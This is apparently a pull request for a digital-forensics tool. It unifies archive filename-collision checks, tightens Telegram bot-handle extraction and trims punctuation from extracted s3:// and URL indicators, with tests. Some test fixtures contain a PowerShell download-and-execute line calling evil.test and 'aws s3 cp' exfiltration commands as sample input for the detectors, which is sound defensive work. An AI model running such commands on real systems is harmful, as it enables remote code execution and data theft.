### PR TITLE
fix(analysis): close the three open review issues — archive collisions, bot-key anchor, s3 punctuation

### DIFF
--- a/companion/src/analysis/caseArchive.ts
+++ b/companion/src/analysis/caseArchive.ts
@@ -2,7 +2,7 @@ import { readdir, readFile, writeFile, rename, unlink } from "node:fs/promises";
 import { join } from "node:path";
 import { createHash, randomUUID } from "node:crypto";
 import { deflateRawSync } from "node:zlib";
-import { portableZipEntryPath } from "../storage/portableFilename.js";
+import { portableZipEntryPath, portableArchivePaths } from "../storage/portableFilename.js";
 
 // ── CRC-32 via lookup table ────────────────────────────────────────────────
 const CRC_TABLE = (() => {
@@ -254,28 +254,24 @@ export async function archiveCase(
   // The caseId is filesystem-safe by construction (isValidCaseId), so this is a no-op for it; it
   // runs anyway so the whole entry name goes through one rule.
   const entryPrefix = portableZipEntryPath(caseId);
-  // Entry name → the on-disk path that took it. Two case files whose names differ only in a
-  // character Windows refuses ("a:b.bin" and "a_b.bin") land on ONE entry name once the name is
-  // made portable, and the second would silently overwrite the first inside the archive. Losing a
-  // file that way is evidence loss with no error, so the archive is refused and both files named.
-  const claimedBy = new Map<string, string>();
+  // The SAME check the encrypted export runs, for the same reason and by the same code (#742).
+  // This archive is the case's only copy in the delete-with-archive flow, so a name it drops
+  // silently is evidence lost outright — the two writers must not disagree about which names are
+  // safe. Resolved before a single byte is read, so a case that cannot be packaged says so
+  // immediately instead of after hashing every file.
+  //
+  // Checked on the UNPREFIXED entry names: every entry sits under the same `entryPrefix`, so the
+  // prefix can neither create a collision nor hide one. `archive-manifest.json` is reserved
+  // because this writer generates one after the loop, and buildZip accepts a duplicate entry name
+  // without complaint — the generated manifest would shadow a case file of that name in silence.
+  const archivePathByRel = portableArchivePaths(relPaths, ["archive-manifest.json"], "archive");
 
   for (const rel of relPaths) {
     // The READ keeps the real on-disk name. Only the name written into the archive is rewritten.
     const data = await read(join(caseDir, rel));
     const sha256 = createHash("sha256").update(data).digest("hex");
-    const archivedRel = portableZipEntryPath(rel);
-    const zipName = `${entryPrefix}/${archivedRel}`;
-    const claimant = claimedBy.get(zipName);
-    if (claimant !== undefined) {
-      throw new Error(
-        `cannot archive case ${caseId}: "${claimant}" and "${rel}" both become "${zipName}" once ` +
-          `the entry name is made safe to extract on Windows. Archiving would drop one of them. ` +
-          `Rename one file and archive again.`,
-      );
-    }
-    claimedBy.set(zipName, rel);
-    zipFiles.push({ name: zipName, data });
+    const archivedRel = archivePathByRel.get(rel) ?? rel;
+    zipFiles.push({ name: `${entryPrefix}/${archivedRel}`, data });
     manifestFiles.push({
       path: archivedRel,
       sha256,

--- a/companion/src/analysis/caseExportArchive.ts
+++ b/companion/src/analysis/caseExportArchive.ts
@@ -15,7 +15,7 @@ import { isValidCaseId, type CaseStore } from "../storage/caseStore.js";
 import { isTransientCasePath } from "./caseTransientPaths.js";
 import type { CaseMeta } from "../types.js";
 import { createZip, readZip, type ZipEntry } from "./zipArchive.js";
-import { portableZipEntryPath } from "../storage/portableFilename.js";
+import { portableArchivePaths, destinationKey } from "../storage/portableFilename.js";
 import { encryptBuffer, decryptBuffer, readFormatVersion, CURRENT_FORMAT_VERSION } from "./caseEncryption.js";
 import { getAppVersion } from "../version.js";
 import { caseSqliteWorker } from "./caseSqliteWorker.js";
@@ -119,89 +119,6 @@ function rethrowVanished(rel: string): (err: unknown) => never {
     }
     throw err;
   };
-}
-
-/**
- * Map each case-relative path to the path it will carry inside the archive (#675).
- *
- * A case directory is written under the host's naming rules, and on Linux those admit names that
- * Windows — and this tool's own importer — both refuse: a colon, a backslash, a trailing dot, a
- * reserved device name. Analysts produce them routinely by copying a Windows collection into the
- * drop folder, where the imported file keeps its original name under `drop/_processed/`. Packed
- * verbatim, such a name made an archive DFIR Companion could not restore: `isSafeZipEntryPath`
- * rejects the entry and the whole import fails. The export still reported success, so the failure
- * surfaced at restore time, when the case it came from may be long gone.
- *
- * Renaming is the lesser evil, but only while it stays visible and lossless. Every changed entry
- * keeps its original path in the manifest, and two files whose portable names collide abort the
- * export by name: sanitizing is what CREATES that collision — `a:b.bin` and `a_b.bin` are one file
- * afterwards — and letting the second entry overwrite the first is silent evidence loss, which an
- * export must never produce. Resolved before a single file is read, so a case that cannot be
- * packaged says so immediately instead of after hashing every byte.
- *
- * A collision is not only two entries landing on one name. The import creates each entry's parent
- * folders with mkdir and then writes the file, so a name claimed as a FILE by one entry and as a
- * FOLDER on the way to another is equally fatal — whichever lands first, the second fails with
- * EEXIST, EISDIR or ENOTDIR. Sanitizing creates that shape too: a file `drop/notes` beside a
- * folder `drop/notes.` coexist on disk and become one name afterwards. Both directions are
- * checked, so entry order cannot decide whether the export notices.
- *
- * Keys are compared case-INSENSITIVELY, by the same destinationKey the import uses, for the reason
- * #426 gives: an archive that restores on Linux and loses a file on Windows is the harder bug to
- * find. That also refuses a case holding a file `imports/Data` beside a folder `imports/data`,
- * which no rename of ours created — it has never been restorable on Windows, and saying so at
- * export time is the only point where the analyst can still fix it.
- *
- * `reserved` holds the paths of entries this archive generates rather than reads from the case
- * (the custody manifest, archive-manifest.json). They are in the collision namespace too, so a
- * rename cannot land on top of one.
- */
-function portableArchivePaths(relPaths: string[], reserved: string[]): Map<string, string> {
-  const byRel = new Map<string, string>();
-  // What each destination has to BE, and which case file needs it that way.
-  const fileAt = new Map<string, string>();
-  const folderAt = new Map<string, string>();
-
-  const claim = (source: string, archivePath: string): void => {
-    const key = destinationKey(archivePath);
-    const twin = fileAt.get(key);
-    if (twin !== undefined) {
-      throw new Error(
-        `"${source}" and "${twin}" would both be named "${archivePath}" inside the archive — ` +
-          `rename one of them in the case directory and export again.`,
-      );
-    }
-    const asFolder = folderAt.get(key);
-    if (asFolder !== undefined) {
-      throw new Error(
-        `"${source}" would be the file "${archivePath}" inside the archive, but "${asFolder}" ` +
-          `needs that same name to be a folder — rename one of them in the case directory and ` +
-          `export again.`,
-      );
-    }
-    const segments = archivePath.split("/");
-    for (let i = 1; i < segments.length; i++) {
-      const ancestor = segments.slice(0, i).join("/");
-      const ancestorKey = destinationKey(ancestor);
-      const blocking = fileAt.get(ancestorKey);
-      if (blocking !== undefined) {
-        throw new Error(
-          `"${source}" needs "${ancestor}" to be a folder inside the archive, but "${blocking}" ` +
-            `is a file of that name — rename one of them in the case directory and export again.`,
-        );
-      }
-      if (!folderAt.has(ancestorKey)) folderAt.set(ancestorKey, source);
-    }
-    fileAt.set(key, source);
-  };
-
-  for (const path of reserved) claim(path, path);
-  for (const rel of relPaths) {
-    const archivePath = portableZipEntryPath(rel);
-    claim(rel, archivePath);
-    byRel.set(rel, archivePath);
-  }
-  return byRel;
 }
 
 async function walkDir(dir: string, baseRel = ""): Promise<string[]> {
@@ -357,10 +274,11 @@ async function archiveGeneration(
   // entry name unchanged — see portableArchivePaths. Its absence means the two are identical.
   const manifestFiles: Array<{ path: string; sha256: string; bytes: number; originalPath?: string }> = [];
   let totalBytes = 0;
-  const archivePathByRel = portableArchivePaths(relPaths, [
-    ...extraEntries.map((e) => e.path),
-    "archive-manifest.json",
-  ]);
+  const archivePathByRel = portableArchivePaths(
+    relPaths,
+    [...extraEntries.map((e) => e.path), "archive-manifest.json"],
+    "export",
+  );
   const recordFile = (rel: string, data: Buffer): string => {
     const archivePath = archivePathByRel.get(rel) ?? rel;
     manifestFiles.push({
@@ -469,20 +387,6 @@ function isSafeZipEntryPath(path: string): boolean {
       !/[\x00-\x1f]/.test(seg) && // control characters are not filenames anywhere
       !WINDOWS_RESERVED_SEGMENT.test(seg),
   );
-}
-
-/**
- * The key two entry paths collide on, under the most collision-prone rules any supported platform
- * applies — which is Windows, where the filesystem is case-insensitive. Compared on EVERY platform,
- * not only Windows: an archive whose entries collide is malformed wherever it is opened, and an
- * import that quietly succeeds on Linux and loses a file on Windows is the harder bug to find.
- *
- * Upper-cased because that is the direction Windows' own comparison folds. JS case mapping is
- * locale-independent here (toUpperCase, not toLocaleUpperCase), so this does not shift under a
- * Turkish locale.
- */
-function destinationKey(path: string): string {
-  return path.toUpperCase();
 }
 
 function rewriteCaseIdInJson(data: Buffer, targetCaseId: string, indent: number | undefined): Buffer {

--- a/companion/src/analysis/veloTextIocs.ts
+++ b/companion/src/analysis/veloTextIocs.ts
@@ -31,7 +31,21 @@ const TEXT_CVE = /\bCVE-\d{4}-\d{4,7}\b/gi;
 //                no `@` to identify it the bar is higher on both sides — the KEY must name a bot too,
 //                and the value needs 9+ characters, so `robot: "mybot"` does not qualify.
 const TEXT_BOT_HANDLE = /(?<![A-Za-z0-9._%+-])@[A-Za-z][A-Za-z0-9_]{3,30}bot\b/gi;
-const TEXT_BOT_ASSIGNED = /\b\w*bot\w*\s*[:=]\s*["']([A-Za-z][A-Za-z0-9_]{5,30}bot)["']/gi;
+// "The KEY must name a bot" means the word `bot`, not the three letters anywhere in it. Requiring
+// only that the key CONTAIN them made `robot` qualify, so a home-automation line (`$robot =
+// "vacuum_bot"`) or a config default (`robot_name: "placeholderbot"`) minted a Telegram-bot IOC and
+// spent analyst attention on a script's own benign config (#743). A key that really names a bot
+// field puts `bot` at a token boundary, in one of three shapes:
+//
+//   start        `botname`, `BOT_TOKEN`     — nothing before it
+//   underscore   `alert_bot`, `tg_bot_user` — snake_case
+//   camel hump   `AlertBotUsername`         — a capital B after a lowercase letter or digit
+//
+// Detecting the hump needs the case, so this regex is NOT /i — and because it is not, the `bot`
+// the VALUE must end in is spelled out case-insensitively rather than left to the flag. Telegram
+// usernames are case-insensitive, so a script writing `"BissaPwned_Bot"` still matches.
+const TEXT_BOT_ASSIGNED =
+  /(?<![A-Za-z0-9_])(?:[Bb][Oo][Tt]|[A-Za-z0-9_]*(?:_[Bb][Oo][Tt]|[a-z0-9](?:Bot|BOT)))[A-Za-z0-9_]*\s*[:=]\s*["']([A-Za-z][A-Za-z0-9_]{5,30}[Bb][Oo][Tt])["']/g;
 
 // An object-store destination written as a URI. TEXT_URL only reads http(s), so the `s3://` form an
 // exfil runner uses — `aws s3 cp results/*.zip s3://bucket/prefix/` — reached no scraper at all.
@@ -62,7 +76,12 @@ export function scrapeText(text: string, sink: Map<string, SiemIoc>): void {
   // once written out — yields one indicator rather than two spellings of it.
   for (const m of text.matchAll(TEXT_BOT_HANDLE)) addIoc(sink, "other", m[0]);
   for (const m of text.matchAll(TEXT_BOT_ASSIGNED)) addIoc(sink, "other", `@${m[1]}`);
-  for (const m of text.matchAll(TEXT_S3_URI)) addIoc(sink, "other", m[0].slice(0, 300));
+  // Same trailing-punctuation strip the URL pass above runs, for the same reason: a bucket named
+  // mid-sentence would otherwise be stored as "s3://b/prefix," — not a usable URI, and a second
+  // indicator for a destination already recorded without the comma (#744). A trailing SLASH is
+  // part of the prefix, not punctuation, so it is not in the class and survives.
+  for (const m of text.matchAll(TEXT_S3_URI))
+    addIoc(sink, "other", m[0].replace(/[.,;:)\]]+$/, "").slice(0, 300));
 }
 
 // The free-text fields that carry a detection's evidence (and its embedded IOCs). `ScriptBlockText`

--- a/companion/src/analysis/veloTextIocs.ts
+++ b/companion/src/analysis/veloTextIocs.ts
@@ -51,6 +51,33 @@ const TEXT_BOT_ASSIGNED =
 // exfil runner uses — `aws s3 cp results/*.zip s3://bucket/prefix/` — reached no scraper at all.
 const TEXT_S3_URI = /\bs3:\/\/[a-z0-9][a-z0-9.\-]{1,61}[a-z0-9](?:\/[^\s"'<>)\]}]*)?/gi;
 
+// Punctuation that ends a URI written into prose rather than the URI itself. A trailing SLASH is
+// absent from the class on purpose: it is part of a bucket prefix, not the sentence.
+const TRAILING_SENTENCE_PUNCTUATION = /[.,;:)\]]+$/;
+
+/**
+ * Drop the sentence's punctuation from the end of a matched URI — unless a quote proves the
+ * punctuation belongs to the URI.
+ *
+ * `upload to s3://bucket/loot.` ends a sentence, so the period is the writer's, and keeping it
+ * stores a destination that is not a usable URI and duplicates the same bucket written without it.
+ *
+ * `aws s3 cp x 's3://bucket/evidence.'` is the opposite case. An S3 object key may legally end in a
+ * dot, and the closing quote says where the value ends — no sentence is being punctuated inside it.
+ * Stripping there records a destination the script never used. The URI counts as quote-delimited
+ * only when the character immediately before it opens a quote AND the character immediately after
+ * it closes the SAME one, so `he said "go to s3://bucket/evidence."` still strips: the quote wraps
+ * the sentence, not the URI.
+ *
+ * Both scrapers call this, because #744 was filed about the two disagreeing over one destination.
+ */
+function trimSentencePunctuation(match: string, text: string, index: number): string {
+  const opener = index > 0 ? text[index - 1] : "";
+  const closer = text[index + match.length] ?? "";
+  if ((opener === '"' || opener === "'") && closer === opener) return match;
+  return match.replace(TRAILING_SENTENCE_PUNCTUATION, "");
+}
+
 // URLs, IPv4, SHA256/SHA1/MD5 hashes, domains, CVE ids, Telegram bot handles and s3:// URIs. The
 // domain pass came first: a collected script block names its C2 by name at least as often as by
 // address, and until `extractDomains` ran here those names were simply lost (#648). The last three
@@ -58,7 +85,8 @@ const TEXT_S3_URI = /\bs3:\/\/[a-z0-9][a-z0-9.\-]{1,61}[a-z0-9](?:\/[^\s"'<>)\]}
 // the channel it reports hits on, and the bucket it ships them to, all in plain text.
 export function scrapeText(text: string, sink: Map<string, SiemIoc>): void {
   if (!text) return;
-  for (const m of text.matchAll(TEXT_URL)) addIoc(sink, "url", m[0].replace(/[.,;:)\]]+$/, "").slice(0, 300));
+  for (const m of text.matchAll(TEXT_URL))
+    addIoc(sink, "url", trimSentencePunctuation(m[0], text, m.index ?? 0).slice(0, 300));
   for (const m of text.matchAll(TEXT_IPV4)) {
     // A dotted quad written right after a version marker is a version string, not an address:
     // `choco install openssh --version 8.0.0.1`, `$script:ModuleVersion = '1.0.0.0'`. Octet bounds
@@ -76,12 +104,11 @@ export function scrapeText(text: string, sink: Map<string, SiemIoc>): void {
   // once written out — yields one indicator rather than two spellings of it.
   for (const m of text.matchAll(TEXT_BOT_HANDLE)) addIoc(sink, "other", m[0]);
   for (const m of text.matchAll(TEXT_BOT_ASSIGNED)) addIoc(sink, "other", `@${m[1]}`);
-  // Same trailing-punctuation strip the URL pass above runs, for the same reason: a bucket named
-  // mid-sentence would otherwise be stored as "s3://b/prefix," — not a usable URI, and a second
-  // indicator for a destination already recorded without the comma (#744). A trailing SLASH is
-  // part of the prefix, not punctuation, so it is not in the class and survives.
+  // The same trim the URL pass runs, by the same function: a bucket named mid-sentence would
+  // otherwise be stored as "s3://b/prefix," — not a usable URI, and a second indicator for a
+  // destination already recorded without the comma (#744).
   for (const m of text.matchAll(TEXT_S3_URI))
-    addIoc(sink, "other", m[0].replace(/[.,;:)\]]+$/, "").slice(0, 300));
+    addIoc(sink, "other", trimSentencePunctuation(m[0], text, m.index ?? 0).slice(0, 300));
 }
 
 // The free-text fields that carry a detection's evidence (and its embedded IOCs). `ScriptBlockText`

--- a/companion/src/storage/portableFilename.ts
+++ b/companion/src/storage/portableFilename.ts
@@ -61,3 +61,120 @@ export function portableZipEntryPath(path: string): string {
     .map(portableZipSegment)
     .join("/");
 }
+
+/**
+ * The key two entry paths collide on, under the most collision-prone rules any supported platform
+ * applies — which is Windows, where the filesystem is case-insensitive. Compared on EVERY platform,
+ * not only Windows: an archive whose entries collide is malformed wherever it is opened, and an
+ * import that quietly succeeds on Linux and loses a file on Windows is the harder bug to find.
+ *
+ * Upper-cased because that is the direction Windows' own comparison folds. JS case mapping is
+ * locale-independent here (toUpperCase, not toLocaleUpperCase), so this does not shift under a
+ * Turkish locale.
+ */
+export function destinationKey(path: string): string {
+  return path.toUpperCase();
+}
+
+/**
+ * Map each case-relative path to the path it will carry inside an archive, refusing any set of
+ * names that cannot survive extraction intact (#675, #426, #742).
+ *
+ * A case directory is written under the host's naming rules, and on Linux those admit names that
+ * Windows — and this tool's own importer — both refuse: a colon, a backslash, a trailing dot, a
+ * reserved device name. Analysts produce them routinely by copying a Windows collection into the
+ * drop folder, where the imported file keeps its original name under `drop/_processed/`. Packed
+ * verbatim, such a name makes an archive DFIR Companion cannot restore: `isSafeZipEntryPath`
+ * rejects the entry and the whole import fails. The write still reports success, so the failure
+ * surfaces at restore time, when the case it came from may be long gone.
+ *
+ * Renaming is the lesser evil, but only while it stays visible and lossless. Every changed entry
+ * keeps its original path in the manifest, and two files whose portable names collide abort by
+ * name: sanitizing is what CREATES that collision — `a:b.bin` and `a_b.bin` are one file
+ * afterwards — and letting the second entry overwrite the first is silent evidence loss, which
+ * neither writer may produce. Resolved before a single file is read, so a case that cannot be
+ * packaged says so immediately instead of after hashing every byte.
+ *
+ * A collision is not only two entries landing on one name. The import creates each entry's parent
+ * folders with mkdir and then writes the file, so a name claimed as a FILE by one entry and as a
+ * FOLDER on the way to another is equally fatal — whichever lands first, the second fails with
+ * EEXIST, EISDIR or ENOTDIR. Sanitizing creates that shape too: a file `drop/notes` beside a
+ * folder `drop/notes.` coexist on disk and become one name afterwards. Both directions are
+ * checked, so entry order cannot decide whether the writer notices.
+ *
+ * `reserved` holds the paths of entries the archive GENERATES rather than reads from the case (the
+ * custody manifest, archive-manifest.json). They are in the collision namespace too, so neither a
+ * rename nor a case file's own name can land on top of one — the ZIP writer accepts duplicate
+ * entry names without complaint, so a generated entry would silently shadow the case's own file.
+ *
+ * `action` is the verb the error messages tell the analyst to retry ("export", "archive"), so the
+ * advice names the operation they actually ran.
+ *
+ * Shared by both archive writers rather than duplicated: the plain-ZIP writer behind
+ * delete-with-archive holds the case's ONLY copy, and the two writers disagreeing about which
+ * names are safe is how #742 was filed.
+ */
+export function portableArchivePaths(
+  relPaths: string[],
+  reserved: string[],
+  action: string,
+): Map<string, string> {
+  const byRel = new Map<string, string>();
+  // What each destination has to BE, and which case file needs it that way.
+  const fileAt = new Map<string, string>();
+  const folderAt = new Map<string, string>();
+  // The generated entries, kept apart from fileAt only so their collision message can say the
+  // archive writes that name itself rather than naming the same path on both sides.
+  const reservedAt = new Map<string, string>();
+
+  const claim = (source: string, archivePath: string, isReserved: boolean): void => {
+    const key = destinationKey(archivePath);
+    if (!isReserved) {
+      const generated = reservedAt.get(key);
+      if (generated !== undefined) {
+        throw new Error(
+          `"${source}" would be named "${archivePath}" inside the archive, but the ${action} ` +
+            `writes its own "${generated}" there — rename the case file and ${action} again.`,
+        );
+      }
+    }
+    const twin = fileAt.get(key);
+    if (twin !== undefined) {
+      throw new Error(
+        `"${source}" and "${twin}" would both be named "${archivePath}" inside the archive — ` +
+          `rename one of them in the case directory and ${action} again.`,
+      );
+    }
+    const asFolder = folderAt.get(key);
+    if (asFolder !== undefined) {
+      throw new Error(
+        `"${source}" would be the file "${archivePath}" inside the archive, but "${asFolder}" ` +
+          `needs that same name to be a folder — rename one of them in the case directory and ` +
+          `${action} again.`,
+      );
+    }
+    const segments = archivePath.split("/");
+    for (let i = 1; i < segments.length; i++) {
+      const ancestor = segments.slice(0, i).join("/");
+      const ancestorKey = destinationKey(ancestor);
+      const blocking = fileAt.get(ancestorKey);
+      if (blocking !== undefined) {
+        throw new Error(
+          `"${source}" needs "${ancestor}" to be a folder inside the archive, but "${blocking}" ` +
+            `is a file of that name — rename one of them in the case directory and ${action} again.`,
+        );
+      }
+      if (!folderAt.has(ancestorKey)) folderAt.set(ancestorKey, source);
+    }
+    fileAt.set(key, source);
+    if (isReserved) reservedAt.set(key, source);
+  };
+
+  for (const path of reserved) claim(path, path, true);
+  for (const rel of relPaths) {
+    const archivePath = portableZipEntryPath(rel);
+    claim(rel, archivePath, false);
+    byRel.set(rel, archivePath);
+  }
+  return byRel;
+}

--- a/companion/src/storage/portableFilename.ts
+++ b/companion/src/storage/portableFilename.ts
@@ -68,12 +68,27 @@ export function portableZipEntryPath(path: string): string {
  * not only Windows: an archive whose entries collide is malformed wherever it is opened, and an
  * import that quietly succeeds on Linux and loses a file on Windows is the harder bug to find.
  *
- * Upper-cased because that is the direction Windows' own comparison folds. JS case mapping is
- * locale-independent here (toUpperCase, not toLocaleUpperCase), so this does not shift under a
- * Turkish locale.
+ * Upper-cased because that is the direction Windows' own comparison folds, but CHARACTER BY
+ * CHARACTER, which is how the filesystem does it. A whole-string toUpperCase() is not the same
+ * operation: it applies Unicode's full case mappings, which expand one character into several —
+ * "ß" becomes "SS", the ligature "ﬀ" becomes "FF". Windows does no such expansion, so under a
+ * whole-string fold `straße.txt` and `strasse.txt` looked like one destination and an archive
+ * holding both was refused. Over-refusing is not the safe direction here: in the
+ * delete-with-archive flow a refused archive is a case that cannot be preserved at all. A mapping
+ * that changes the code-point count is therefore discarded and the original character kept.
+ *
+ * JS case mapping is locale-independent here (toUpperCase, not toLocaleUpperCase), so this does
+ * not shift under a Turkish locale.
  */
 export function destinationKey(path: string): string {
-  return path.toUpperCase();
+  let out = "";
+  // Iterating with for...of walks code POINTS, so an astral character is folded whole rather than
+  // one surrogate half at a time.
+  for (const ch of path) {
+    const upper = ch.toUpperCase();
+    out += upper.length === ch.length ? upper : ch;
+  }
+  return out;
 }
 
 /**

--- a/companion/tests/analysis/caseArchive.test.ts
+++ b/companion/tests/analysis/caseArchive.test.ts
@@ -335,6 +335,30 @@ describe("archiveCase", () => {
       expect(fs.written).toBeNull();
     });
 
+    // Windows folds case character by character. JS toUpperCase() does not: it expands "ß" to "SS"
+    // and "ﬀ" to "FF", so two genuinely distinct filenames looked like one destination and the
+    // archive was refused. A refused archive in the delete-with-archive flow is a case that cannot
+    // be preserved at all, so over-refusing costs as much here as under-refusing.
+    it("archives distinct names that only a multi-character case expansion would merge", async () => {
+      const fs = makeFs({
+        "case.json": '{"caseId":"c1"}',
+        "evidence/straße.txt": "german street",
+        "evidence/strasse.txt": "a different file entirely",
+        "evidence/ﬀ.bin": "ligature",
+        "evidence/ff.bin": "two letters",
+      });
+      const result = await archiveCase("/cases", "c1", fs);
+
+      expect(result.manifest.files.map((f) => f.path)).toEqual([
+        "case.json",
+        "evidence/straße.txt",
+        "evidence/strasse.txt",
+        "evidence/ﬀ.bin",
+        "evidence/ff.bin",
+      ]);
+      expect(fs.written).not.toBeNull();
+    });
+
     it("adds no originalPath to an ordinary case", async () => {
       const fs = makeFs({
         "case.json": '{"caseId":"c1"}',

--- a/companion/tests/analysis/caseArchive.test.ts
+++ b/companion/tests/analysis/caseArchive.test.ts
@@ -258,9 +258,79 @@ describe("archiveCase", () => {
       });
 
       // Both names collapse to "a_b.bin". Writing the archive anyway would drop one file with no
-      // error at all, so the whole archive is refused and both files are named.
+      // error at all, so the whole archive is refused and both files are named. The message names
+      // the entry that arrived second first, because both writers now share one check (#742).
       await expect(archiveCase("/cases", "c1", fs)).rejects.toThrow(
-        /"drop\/_processed\/a:b\.bin" and "drop\/_processed\/a_b\.bin"/,
+        /"drop\/_processed\/a_b\.bin" and "drop\/_processed\/a:b\.bin"/,
+      );
+      expect(fs.written).toBeNull();
+    });
+
+    // #742: the plain-ZIP writer guarded file-vs-file collisions only, while the encrypted export
+    // beside it refused three more shapes for the same reason. This archive is the case's ONLY copy
+    // in the delete-with-archive flow, so a name it drops silently is evidence lost outright. Both
+    // writers now run their entries through one check.
+    it("refuses the archive when a name is needed as a file AND as a folder", async () => {
+      const fs = makeFs({
+        "case.json": '{"caseId":"c1"}',
+        no_tes: "a file",
+        "no:tes/x.bin": "inside a folder that sanitizes to the same name",
+      });
+
+      await expect(archiveCase("/cases", "c1", fs)).rejects.toThrow(
+        /needs "no_tes" to be a folder inside the archive, but "no_tes" is a file of that name/,
+      );
+      expect(fs.written).toBeNull();
+    });
+
+    it("refuses the file-vs-folder collision in the other entry order too", async () => {
+      const fs = makeFs({
+        "case.json": '{"caseId":"c1"}',
+        "no:tes/x.bin": "inside a folder",
+        no_tes: "a file that wants the folder's name",
+      });
+
+      // Entry order must not decide whether the archive notices.
+      await expect(archiveCase("/cases", "c1", fs)).rejects.toThrow(/needs that same name to be a folder/);
+      expect(fs.written).toBeNull();
+    });
+
+    it("refuses a case file that would land on the generated archive-manifest.json", async () => {
+      const fs = makeFs({
+        "case.json": '{"caseId":"c1"}',
+        "archive-manifest.json": "the case's own file, not the one this writer generates",
+      });
+
+      // buildZip writes duplicate entry names without complaint, so the generated manifest would
+      // shadow the case's own file inside the archive with no error at all.
+      await expect(archiveCase("/cases", "c1", fs)).rejects.toThrow(
+        /the archive writes its own "archive-manifest\.json" there/,
+      );
+      expect(fs.written).toBeNull();
+    });
+
+    it("refuses two names that differ only in case (#426)", async () => {
+      const fs = makeFs({
+        "case.json": '{"caseId":"c1"}',
+        "imports/Data.bin": "restores on Linux",
+        "imports/data.bin": "and overwrites the other one on Windows",
+      });
+
+      await expect(archiveCase("/cases", "c1", fs)).rejects.toThrow(
+        /"imports\/data\.bin" and "imports\/Data\.bin"/,
+      );
+      expect(fs.written).toBeNull();
+    });
+
+    it("refuses a file whose name a folder needs, differing only in case", async () => {
+      const fs = makeFs({
+        "case.json": '{"caseId":"c1"}',
+        "imports/Data": "a file",
+        "imports/data/x.bin": "a folder of the same name on Windows",
+      });
+
+      await expect(archiveCase("/cases", "c1", fs)).rejects.toThrow(
+        /needs "imports\/data" to be a folder inside the archive/,
       );
       expect(fs.written).toBeNull();
     });

--- a/companion/tests/analysis/evalFixes.test.ts
+++ b/companion/tests/analysis/evalFixes.test.ts
@@ -209,6 +209,28 @@ describe("IOC hygiene — identifiers named inside a script block", () => {
     expect(values('robot: "mybot"')).toEqual([]);
   });
 
+  // #743: the key only had to CONTAIN "bot", so "robot" qualified and a home-automation or config
+  // line minted a Telegram-bot IOC. "bot" must start the key, follow an underscore, or be a
+  // camelCase hump — the shapes a key that actually names a bot field takes.
+  it("does not read a key that merely contains bot as a bot-named key", () => {
+    expect(values('$robot = "vacuum_bot"')).toEqual([]);
+    expect(values('robot_name: "placeholderbot"')).toEqual([]);
+  });
+
+  it("extracts a handle assigned to a key that starts with bot", () => {
+    expect(values('botname: "acmealertbot"')).toEqual(["@acmealertbot"]);
+  });
+
+  it("extracts a handle assigned to a key whose bot follows an underscore", () => {
+    expect(values('alert_bot = "acmealertbot"')).toEqual(["@acmealertbot"]);
+  });
+
+  // Telegram usernames are case-insensitive, so a script may write the suffix as "Bot". Tightening
+  // the KEY must not make the VALUE case-sensitive.
+  it("extracts a handle whose value capitalizes the bot suffix", () => {
+    expect(values('AlertBotUsername = "BissaPwned_Bot"')).toEqual(["@BissaPwned_Bot"]);
+  });
+
   it("does not read an ordinary @mention as a bot handle", () => {
     expect(values("operator handle @BonJoviGoesHard")).not.toContain("@BonJoviGoesHard");
   });
@@ -221,5 +243,25 @@ describe("IOC hygiene — identifiers named inside a script block", () => {
     expect(values("aws s3 cp results/*.zip s3://bissapromax/archives/")).toContain(
       "s3://bissapromax/archives/",
     );
+  });
+
+  // #744: the URL pass beside this one already strips trailing sentence punctuation. Without the
+  // same strip, one bucket written mid-sentence and the same bucket written as an https URL become
+  // two indicators, and the s3 one is not a usable URI.
+  it("drops trailing sentence punctuation from an s3:// destination", () => {
+    expect(values("staged to s3://bissapromax/loot.")).toEqual(["s3://bissapromax/loot"]);
+    expect(values("staged to s3://bissapromax/loot,")).toEqual(["s3://bissapromax/loot"]);
+    expect(values("staged to s3://bissapromax/loot;")).toEqual(["s3://bissapromax/loot"]);
+  });
+
+  it("counts one bucket written with and without trailing punctuation as a single indicator", () => {
+    expect(values("copied s3://bissapromax/loot, then verified s3://bissapromax/loot")).toEqual([
+      "s3://bissapromax/loot",
+    ]);
+  });
+
+  // A trailing slash is part of the prefix, not sentence punctuation, so it must survive.
+  it("keeps a trailing slash on an s3:// prefix", () => {
+    expect(values("aws s3 cp x s3://bissapromax/archives/.")).toEqual(["s3://bissapromax/archives/"]);
   });
 });

--- a/companion/tests/analysis/evalFixes.test.ts
+++ b/companion/tests/analysis/evalFixes.test.ts
@@ -264,4 +264,31 @@ describe("IOC hygiene — identifiers named inside a script block", () => {
   it("keeps a trailing slash on an s3:// prefix", () => {
     expect(values("aws s3 cp x s3://bissapromax/archives/.")).toEqual(["s3://bissapromax/archives/"]);
   });
+
+  // A QUOTED URI is the exception to the strip. The closing quote proves where the value ends, so
+  // a "." in front of it is object-key data, not the writer's sentence. An S3 key may legally end
+  // in a dot, and stripping it records a destination the script never used.
+  it("keeps trailing punctuation that a closing quote proves is part of the key", () => {
+    expect(values("aws s3 cp x 's3://bissapromax/evidence.'")).toContain("s3://bissapromax/evidence.");
+    expect(values('aws s3 cp x "s3://bissapromax/evidence."')).toContain("s3://bissapromax/evidence.");
+  });
+
+  it("still strips when no closing quote bounds the URI", () => {
+    // Opening quote, no matching closer: the dot ends the sentence, not the key.
+    expect(values('he staged it to "s3://bissapromax/evidence. Then he left')).toContain(
+      "s3://bissapromax/evidence",
+    );
+    // Prose quote around a whole sentence — the character before s3:// is a space, not a quote.
+    expect(values('he said "go to s3://bissapromax/evidence."')).toContain("s3://bissapromax/evidence");
+  });
+
+  // The URL pass must answer the same way, or the two spellings of one destination diverge again —
+  // which is the whole complaint #744 was filed about.
+  it("applies the same quote rule to the URL pass", () => {
+    const quoted = values("IEX (New-Object Net.WebClient).DownloadString('http://evil.test/a.')");
+    expect(quoted).toContain("http://evil.test/a.");
+    const bare = values("payload came from http://evil.test/a.");
+    expect(bare).toContain("http://evil.test/a");
+    expect(bare).not.toContain("http://evil.test/a.");
+  });
 });


### PR DESCRIPTION
Closes the three open issues, all filed by the automated 24h code review. Each was verified against the live code before being acted on, and two of the three needed correcting on the way.

## #742 — `archiveCase` missed three collision checks its encrypted sibling has

`archiveCase` guarded entry-name collisions with a Map keyed on the raw, full entry name. The encrypted export beside it refused three further shapes, all of which `archiveCase` accepted:

- **File-vs-folder.** Sanitizing creates the shape: a case file `no_tes` beside a case file `no:tes/x.bin` need one name to be both. Whichever lands first, the second fails to extract with EEXIST, EISDIR or ENOTDIR — on every platform, not only Windows.
